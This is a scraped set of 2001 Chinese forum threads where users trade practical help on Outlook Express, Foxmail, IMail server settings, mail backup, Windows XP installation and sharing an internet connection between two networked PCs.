 发表于 2001-12-03 01:42:23 按此观看nicely的个人资料 按此发邮件给nicely nicely 的 oicq 是7955851,查看 7955851 的资料 收藏该主题供以后查看 发送悄悄话给nicely 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看nicely的IP
Outlook Express可以设置密码吗.象FOXMAIL一样.设置邮箱的密码.

by nicely
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-03 23:03:32 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
可以的，但是只能设置，不能更改的，就在你的帐户信息你设置，注意你的连接网络的方式，不要错~

WINDFLASH
::浅紫色FORUM::
nicely

初级用户
积分：40
发帖：19
来自：
注册：2001-07-29
 发表于 2001-12-03 23:35:21 按此观看nicely的个人资料 按此发邮件给nicely nicely 的 oicq 是7955851,查看 7955851 的资料 发送悄悄话给nicely 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看nicely的IP
谢...我试试...........

by nicely
crystal

水晶
积分：2499
发帖：2823
来自：QUAKE
注册：2000-01-30
 发表于 2001-12-04 01:57:12 按此观看crystal的个人资料 该用户不允许显示它的电子邮件 访问crystal的主页 crystal 的 oicq 是1073810,查看 1073810 的资料 发送悄悄话给crystal 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看crystal的IP
其实就是管理标识，作用和fm中的用户时一样的，但是oe中的标识是不能看到别的标识的邮件的，从这点来说保密性要比fm好

书山有路勤为径，学海无涯苦作舟　　Current Project : JSP Nuke
ayoung

超级用户
积分：403
发帖：158
来自：北京
注册：2000-11-14
 发表于 2001-12-05 10:46:12 按此观看ayoung的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ayoung 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ayoung的IP
那我如果希望我的已经下载下来的邮件，也加密可以吗？

^忘忧草^幸运草^
上一贴 | 下一贴
快速回复 | 主题：Outlook Express
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如果Outlook Express出错，该如何解决？

计算机技术
如果Outlook Express出错，该如何解决？

上一贴 | 下一贴
发表人 主题: 如果Outlook Express出错，该如何解决？
nicely

初级用户
积分：40
发帖：19
来自：
注册：2001-07-29
 发表于 2001-11-30 03:32:05 按此观看nicely的个人资料 按此发邮件给nicely nicely 的 oicq 是7955851,查看 7955851 的资料 收藏该主题供以后查看 发送悄悄话给nicely 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看nicely的IP
每次启动Outlook Express，一要看邮件程序就没有响应。一次收下来的邮件大约有三四十封吧。每次打开要看。就这样没了反应。需用强制命令才能把它关掉。不明白到底是哪里出了错。？？？

by nicely
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-30 18:21:51 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
nicely在上个帖子中说
引用:
每次启动Outlook Express，一要看邮件程序就没有响应。一次收下来的邮件大约有三四十封吧。每次打开要看。就这样没了反应。需用强制命令才能把它关掉。不明白到底是哪里出了错。？？？

1.病毒
2.系统文件被替换过出错

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

nicely

初级用户
积分：40
发帖：19
来自：
注册：2001-07-29
 发表于 2001-12-01 01:17:29 按此观看nicely的个人资料 按此发邮件给nicely nicely 的 oicq 是7955851,查看 7955851 的资料 发送悄悄话给nicely 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看nicely的IP
恩。有可能是病毒。里面有三四十封邮件。全是垃圾。大部分是E文。
看都沒看过。就当机啦。现在该如何解决？

[这消息被nicely编辑过(编辑时间2001-12-01 01:20:34)]

by nicely
crystal

水晶
积分：2499
发帖：2823
来自：QUAKE
注册：2000-01-30
 发表于 2001-12-01 14:40:06 按此观看crystal的个人资料 该用户不允许显示它的电子邮件 访问crystal的主页 crystal 的 oicq 是1073810,查看 1073810 的资料 发送悄悄话给crystal 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看crystal的IP
很可能是病毒

书山有路勤为径，学海无涯苦作舟　　Current Project : JSP Nuke
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-01 22:26:14 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
最好不用 outlook，它很不好用，有时候还不能发邮件，用foxmail吧，

WINDFLASH
::浅紫色FORUM::
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-12-02 00:59:55 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
yuzhiqing在上个帖子中说
引用:
最好不用 outlook，它很不好用，有时候还不能发邮件，用foxmail吧，

没错，还是用FOXMAIL吧！

Dripping water wears away a stone.
上一贴 | 下一贴
快速回复 | 主题：如果Outlook Express出错，该如何解决？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


IMail如何设置web登陆页面

计算机技术
IMail如何设置web登陆页面

上一贴 | 下一贴
发表人 主题: IMail如何设置web登陆页面
bibi

高级用户
积分：214
发帖：68
来自：
注册：2001-05-14
 发表于 2001-11-29 23:42:39 按此观看bibi的个人资料 按此发邮件给bibi bibi 的 oicq 是37411963,查看 37411963 的资料 收藏该主题供以后查看 发送悄悄话给bibi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bibi的IP
谢谢指点
colorbird

木鱼
经典元老
积分：1077
发帖：670
来自：湖南长沙
注册：2000-06-17
 发表于 2001-11-30 02:20:49 按此观看colorbird的个人资料 按此发邮件给colorbird 访问colorbird的主页 发送悄悄话给colorbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看colorbird的IP
安装完了以后，通过http://www.***.com:8383来访问它！
如果你没改端口的话！端口可以在imail administrator里面修改.

http://www.powerutv.com:8383

An active pessimist.
Blueidea Web Team.
Team member
bibi

高级用户
积分：214
发帖：68
来自：
注册：2001-05-14
 发表于 2001-12-01 16:08:00 按此观看bibi的个人资料 按此发邮件给bibi bibi 的 oicq 是37411963,查看 37411963 的资料 发送悄悄话给bibi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bibi的IP
要怎么设置？能不能具体讲一下，谢谢了。
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-02 00:35:47 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
bibi在上个帖子中说
引用:
要怎么设置？能不能具体讲一下，谢谢了。

这里看看吧

[这消息被yunbin编辑过(编辑时间2001-12-02 00:36:33)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：IMail如何设置web登陆页面
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于imail 7中的smtp设置问题。急。。。

计算机技术
关于imail 7中的smtp设置问题。急。。。

上一贴 | 下一贴
发表人 主题: 关于imail 7中的smtp设置问题。急。。。
Huya

虎 牙
现任版主
积分：3856
发帖：1471
来自：Nook
注册：2000-08-30
 发表于 2001-11-15 10:23:29 按此观看Huya的个人资料 按此发邮件给Huya 访问Huya的主页 收藏该主题供以后查看 发送悄悄话给Huya 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Huya的IP
偶的问题就是在imail7中如何设置smtp。就是说下图中SMTP Security这项里到底应该怎么设置呢？

偶急用，谢谢了。

www.HUYA.com
大轰吹大轰吹冰激淋流泪

Blueidea Web Team.
Moderator Of Photoshop & ImageReady Forum

小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-15 11:35:10 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
http://www.enanshan.com/mail/imail-2-11.htm
上一贴 | 下一贴
快速回复 | 主题：关于imail 7中的smtp设置问题。急。。。
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


outlook怎么备份呢？

计算机技术
outlook怎么备份呢？

上一贴 | 下一贴
发表人 | 主题: outlook怎么备份呢？
荠荠菜 终级用户 积分：725 发帖：258 来自： 注册：2000-08-28 | 发表于 2001-11-08 09:57:57 按此观看荠荠菜的个人资料 按此发邮件给荠荠菜 荠荠菜 的 oicq 是1117088,查看 1117088 的资料 收藏该主题供以后查看 发送悄悄话给荠荠菜 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看荠荠菜的IP 我家里的机器用的还是98，现在有点不太稳定，我想格式化c盘，装2000，就是不知道怎么备份outlook里面的通讯录和重要文件，有没高人给指点一下呀！我公司里的机器是2000，我也想重装一下，也是备份重要文件的问题！呵呵！给指点指点吧！ 我坐在这里，你站在旁边 是一种缘分...... 我站在月台，你坐在车上 是一种遗憾......
CrazyParty 群山之巅 积分：2164 发帖：811 来自：温州 注册：2000-10-14 | 发表于 2001-11-08 10:17:27 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP 找个备份工具或者就copy邮件目录 这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
荠荠菜 终级用户 积分：725 发帖：258 来自： 注册：2000-08-28 | 发表于 2001-11-08 13:21:29 按此观看荠荠菜的个人资料 按此发邮件给荠荠菜 荠荠菜 的 oicq 是1117088,查看 1117088 的资料 发送悄悄话给荠荠菜 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看荠荠菜的IP 提的问题还没解决呢，怎么就没人理了呢！555～～～～～还有否人有什么好的建议了？！ 我坐在这里，你站在旁边 是一种缘分...... 我站在月台，你坐在车上 是一种遗憾......
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-11-08 14:01:40 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP 备份通讯录：打开通讯录，选文件—>导出—>通讯簿，然后选择个位置就行了。 邮件备份：选择一封邮件，选文件—>另存为，就行了 "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
flyingbird 想飞的心 积分：4546 发帖：1672 来自： 注册：1999-12-22 | 发表于 2001-11-08 14:39:03 按此观看flyingbird的个人资料 按此发邮件给flyingbird 发送悄悄话给flyingbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flyingbird的IP File -> import and export -> export to a file -> personal folder file(.pst) 导入时同样的步骤。 行者无疆 Blueidea Web Team Team member
荠荠菜 终级用户 积分：725 发帖：258 来自： 注册：2000-08-28 | 发表于 2001-11-08 15:06:02 按此观看荠荠菜的个人资料 按此发邮件给荠荠菜 荠荠菜 的 oicq 是1117088,查看 1117088 的资料 发送悄悄话给荠荠菜 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看荠荠菜的IP 谢谢！我现试试看！：） 我坐在这里，你站在旁边 是一种缘分...... 我站在月台，你坐在车上 是一种遗憾......
randomix 小 乱 积分：4642 发帖：1647 来自：亂度謎城 注册：2000-11-30 | 发表于 2001-11-08 18:34:24 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP hellslyaer说的 邮件备份：选择一封邮件，选文件—>另存为 那会做死人的。 flyingbird说的对！ 不过我不知道菜菜用的是OUTLOOK还是OUTLOOK express，如果是express是没有flyingbird说的那个方法的，但是可以找到OE的收件箱、备份起来的，我忘记名字了。。。回去找找 always ran...
plw 超级用户 积分：387 发帖：625 来自：荆州 注册：2001-05-18 | 发表于 2001-11-08 22:30:21 按此观看plw的个人资料 按此发邮件给plw plw 的 oicq 是19759705,查看 19759705 的资料 发送悄悄话给plw 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看plw的IP 想备份邮件很简单啊，全选你的邮件，然后把它们拖到你想备份的目录，OK啦 ;) It's a humdrum day again!
hw 初级用户 积分：0 发帖：4 来自： 注册：2001-10-09 | 发表于 2001-11-08 23:58:58 按此观看hw的个人资料 按此发邮件给hw 发送悄悄话给hw 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hw的IP 备份通讯录：打开通讯录，选文件—>导出—>通讯簿，然后选择个位置就行了。 备份邮件：选择工——选项——维护——存储文件夹，找出目前邮件的存储位置，将其备份，完成系统安装后将此存储位置更改为所备份的文件夹，或将所备份的所有文件复制到系统默认的存储位置。
solomon 锋子 积分：1700 发帖：2813 来自：Mahabrahman 注册：2001-04-01 | 发表于 2001-11-09 01:27:52 按此观看solomon的个人资料 按此发邮件给solomon 访问solomon的主页 solomon 的 oicq 是2300666,查看 2300666 的资料 发送悄悄话给solomon 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看solomon的IP outlook-文件-导出-邮件 或者在系统盘下面搜索 发件箱.dbx 已发送邮件.dbx 已删除邮件.dbx 草稿.dbx等文件 年轻人不要着急挣钱， 也不要着急建立什么关系！ 重要的是先把自己的基础夯实！ 挣钱不是挣一时， 要挣就挣一辈子！！！ Blueidea Web Team. Team Spalpeen.
上一贴 | 下一贴
快速回复 | 主题：outlook怎么备份呢？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


哪位高手，帮我解决一个foxmail的问题~~！急呀

计算机技术
哪位高手，帮我解决一个foxmail的问题~~！急呀

上一贴 | 下一贴
发表人 主题: 哪位高手，帮我解决一个foxmail的问题~~！急呀
宇宙星云

终级用户
积分：474
发帖：305
来自：广州
注册：2000-12-13
 发表于 2001-11-08 11:55:41 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 收藏该主题供以后查看 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP
我想把自己的html文件的简历通过foxmail发出。
但我用ie打开简历时候点：文件—发送—电子邮件页面。竟然启动不了foxmail~~！！！

我在：工具—internet选项—程序—电子邮件 里面已经设置好把foxmai作为发送邮件的工具啊。怎么失灵了？？？？？l 各位，谁知道这是怎么回事？？？？

┏━━┓∴· oooO Oooo°∴┏━━┓
┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃
┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃
┗━━┛★．° \_) (_/·．★┗━━┛
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-08 11:59:51 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
用IE的关联总是有问题，IE只有跟Outlook配合的时候才是最好的。不建议这么用，直接开foxmail怎么了？不行么？

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
宇宙星云

终级用户
积分：474
发帖：305
来自：广州
注册：2000-12-13
 发表于 2001-11-08 15:00:57 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP
hellslayer在上个帖子中说
引用:
直接开foxmail怎么了？不行么？

斑竹，我要发的是htm文件的页面，而直接开foxmail只能把htm页面以附件方式发送呀~！！！

┏━━┓∴· oooO Oooo°∴┏━━┓
┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃
┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃
┗━━┛★．° \_) (_/·．★┗━━┛
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-08 15:26:27 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
似乎foxmail不能实现，至少3.x还不行。用outlook吧。具体方法：

单击邮件窗口中需要添加超级链接或 Web 页文本的位置。

若要添加超级链接，请单击“插入”菜单，然后单击“超级链接”。选择文件类型，然后键入链接的位置和地址。

若要添加 HTML 页面，请单击“插入”菜单，然后单击“文件中的文本”。将“文件类型”框改为“HTML 文件”，然后找到要添加的文件。

提示
如果您无法选择“超级链接”菜单命令，请确认在邮件窗口中启用了 HTML 格式：单击“格式”菜单，然后单击“多信息文本 (HTML)”。选定此项后，该命令旁边将出现一个黑点。

若要为邮件文字创建超级链接，只需在创建超级链接前选定该文字。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
宇宙星云

终级用户
积分：474
发帖：305
来自：广州
注册：2000-12-13
 发表于 2001-11-08 18:43:18 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP
但outlook似乎很多时候都发送不成功哦~~！！

我有时到一些网吧里面上网时候，用outlook发送邮件。明明已经设置好pop和smtp服务器。（如，接受邮件服务器 pop3.21cn.com 发送邮件服务器： smtp.21cn.com）。但还是不成功，这又是为什么呢。？！！！！

反正，我对outlook就是没有好感啊~！

[这消息被宇宙星云编辑过(编辑时间2001-11-08 18:43:30)]

┏━━┓∴· oooO Oooo°∴┏━━┓
┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃
┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃
┗━━┛★．° \_) (_/·．★┗━━┛
plw

超级用户
积分：387
发帖：625
来自：荆州
注册：2001-05-18
 发表于 2001-11-08 22:25:25 按此观看plw的个人资料 按此发邮件给plw plw 的 oicq 是19759705,查看 19759705 的资料 发送悄悄话给plw 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看plw的IP
可能你没有点选密码验证或者没有点选择用什么帐号登陆

[这消息被plw编辑过(编辑时间2001-11-08 22:26:38)]

It's a humdrum day again!
dagetou007

高级用户
积分：213
发帖：77
来自：中国北京
注册：2000-12-06
 发表于 2001-12-26 13:36:45 该用户不允许显示它的电子邮件 dagetou007 的 oicq 是3180729,查看 3180729 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
要是那个HTML里有.swf文件怎么就显示不出来了？
怎么用outlook发带.swf的HTML文件?

[这消息被dagetou007编辑过(编辑时间2001-12-26 13:36:48)]

≡快乐的简单生活≡
上一贴 | 下一贴
快速回复 | 主题：哪位高手，帮我解决一个foxmail的问题~~！急呀
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于安装WIN XP的问题

计算机技术
关于安装WIN XP的问题

上一贴 | 下一贴
发表人 主题: 关于安装WIN XP的问题
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-21 23:12:25 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
我现在的操作系统是2000 server版，要升级到XP是不是得把C盘格了再装？

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-21 23:14:36 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
这那叫升级？明明是降级！

可以不用格，不过一定要重新安装单独的系统了，不能覆盖。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

freedog

初级用户
积分：0
发帖：21
来自：
注册：2001-12-14
 发表于 2001-12-21 23:26:07 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP
不用格！把xp装到另一个分区里面！选全新安装就行！

I am a freedog！
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-22 12:05:51 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
你没有选择的

XP现在只有 Home 和 Pro 版本
两个你都无法在Server上升级

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
bb

初级用户
积分：78
发帖：34
来自：
注册：2001-06-07
 发表于 2001-12-22 20:47:32 按此观看bb的个人资料 按此发邮件给bb 发送悄悄话给bb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bb的IP
要装双系统了
最好在不同的盘装
其实如果是那系统来工作的话，没什么必要装XP
玩游戏的话，XP想对2000来说，好很多哦
菜菜子在上个帖子中说
引用:
我现在的操作系统是2000 server版，要升级到XP是不是得把C盘格了再装？
上一贴 | 下一贴
快速回复 | 主题：关于安装WIN XP的问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


还是关于局域网的问题，(已经成功啦哈哈哈)

计算机技术
还是关于局域网的问题，(已经成功啦哈哈哈)

上一贴 | 下一贴
发表人 主题: 还是关于局域网的问题，(已经成功啦哈哈哈)
silence112

终级用户
积分：1622
发帖：456
来自：川人在浙江
注册：2001-06-04
 发表于 2001-12-03 23:16:14 按此观看silence112的个人资料 按此发邮件给silence112 访问silence112的主页 silence112 的 oicq 是28825855,查看 28825855 的资料 收藏该主题供以后查看 发送悄悄话给silence112 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看silence112的IP
我的两台机子组成了局域网，
一台双网卡，另一台一块网卡，
现在要由双网卡的机子internet共享，
带动单网卡机一起上网．(注:主机是能过宽接入的)

现在的问题在于：
虽然两台都能互相用网上邻居找到对方，
但第二台无法上网，（internet共享已经安装了）
单网卡机在网上邻居中播放主机的realplay文件时总提示：
＂不能定位服务器,此服务器没有DNS入口，请在url中检查服务器的名称并重试。＂

请问要第二台机ＩＥ能上网还需要怎样配置？？
深夜中，等候大家的意见！！
谢谢！

[这消息被silence112编辑过(编辑时间2001-12-03 23:16:39)]
[这消息被silence112编辑过(编辑时间2001-12-04 00:03:52)]
[这消息被silence112编辑过(编辑时间2001-12-04 00:16:12)]

---+好好学习,天天上网+---
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-03 23:24:19 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
你能不能在第二太机子看到主机呢？
也就是网卡的设置错了没有？

WINDFLASH
::浅紫色FORUM::
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-03 23:24:29 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
网络协议设置：
其中一台电脑 选择网上邻居---->右键----〉属性-----〉设置网卡 TCP/IP属性（不要看错了设置了拨号器的TCP/IP属性） IP地址：192.168.0.X （推荐设置为192.168.0.1） 子网掩码 255.255.255.0

另外一台电脑：设置网卡 TCP/IP属性 IP地址：192.168.0.X （推荐设置为192.168.0.2） 子网掩码 255.255.255.0

注意要在网上邻居看到对方需要两台电脑都启用文件和打印机共享 （在网络属性里面有）
工作组(workgroup) 的名字要相同。

如果要两台电脑共享上网的话 拨号的那台电脑修改如下设置：在网络属性里面启用网络共享就行
另外一台 ： 网络属性里面添加如下设置：网关：192.168.0.1（就是另外一台电脑的ip地址）DNS:192.168.0.1（就是另外一台电脑的ip地址）其他不变。

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

silence112

终级用户
积分：1622
发帖：456
来自：川人在浙江
注册：2001-06-04
 发表于 2001-12-04 00:00:43 按此观看silence112的个人资料 按此发邮件给silence112 访问silence112的主页 silence112 的 oicq 是28825855,查看 28825855 的资料 发送悄悄话给silence112 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看silence112的IP
我照yunbin的做了,
但现在仍然只是两台之间互相找得到对方(指在网上邻居中,而且可以读取一台的文件)
但另一台机始终不能上网.
这是什么原因,
再帮忙分析一下,谢谢!!

[这消息被silence112编辑过(编辑时间2001-12-04 00:00:26)]

---+好好学习,天天上网+---
silence112

终级用户
积分：1622
发帖：456
来自：川人在浙江
注册：2001-06-04
 发表于 2001-12-04 00:16:37 按此观看silence112的个人资料 按此发邮件给silence112 访问silence112的主页 silence112 的 oicq 是28825855,查看 28825855 的资料 发送悄悄话给silence112 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看silence112的IP
哈哈,

好了!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
谢谢yunbin的指点!!!!
我已经成功把两台机子都拉上了网!!!!!

---+好好学习,天天上网+---
上一贴 | 下一贴
快速回复 | 主题：还是关于局域网的问题，(已经成功啦哈哈哈)
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
